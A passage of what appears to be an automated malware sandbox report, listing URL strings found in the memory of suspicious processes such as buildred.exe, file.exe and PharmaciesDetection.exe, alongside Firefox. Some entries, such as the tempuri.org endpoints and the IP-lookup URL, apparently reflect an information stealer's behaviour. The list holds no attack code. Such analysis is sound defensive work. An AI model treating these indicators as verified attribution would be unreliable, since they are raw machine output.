Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676783589.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2914617240.00000261932BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2926539269.0000026194A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2945658971.000002640003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.0000026194615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulN&
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulg
Source: file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441439634.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2808523111.0000026192480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: buildred.exe, 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000028.00000002.2925172791.0000026194847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946154664.00000DD94BB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2946900906.00002887A0504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
